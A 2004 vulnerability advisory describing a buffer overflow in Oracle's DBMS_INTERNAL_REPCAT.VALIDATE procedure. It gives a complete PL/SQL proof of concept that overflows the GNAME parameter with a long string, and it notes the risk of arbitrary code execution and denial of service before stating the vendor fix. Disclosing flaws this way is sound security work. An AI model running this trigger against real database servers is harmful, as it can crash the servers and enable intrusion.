|
#35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When VALIDATE procedure is called with a long string in the GNAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BINARY_INTEGER;
P_GNAME VARCHAR2(32767);
P_CHECK_GENFLAGS BOOLEAN;
P_CHECK_VALID_OBJS BOOLEAN;
P_CHECK_LINKS_SCHED BOOLEAN;
P_CHECK_LINKS BOOLEAN;
P_ERROR_MSG_ID NUMBER;
P_ERROR_NUM_ID NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_GNAME := AAA;
P_CHECK_GENFLAGS := FALSE;
P_CHECK_VALID_OBJS := FALSE;
P_CHECK_LINKS_SCHED := FALSE;
P_CHECK_LINKS := FALSE;
P_ERROR_MSG_ID := 1;
P_ERROR_NUM_ID := 1;
RET_VALUE_X123 := SYS.DBMS_INTERNAL_REPCAT.VALIDATE(GNAME => P_GNAME, CHECK_GENFLAGS => P_CHECK_GENFLAGS, CHECK_VALID_OBJS =>
P_CHECK_VALID_OBJS, CHECK_LINKS_SCHED => P_CHECK_LINKS_SCHED, CHECK_LINKS => P_CHECK_LINKS, ERROR_MSG_ID => P_ERROR_MSG_ID, ERROR_NUM_ID =>
P_ERROR_NUM_ID);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
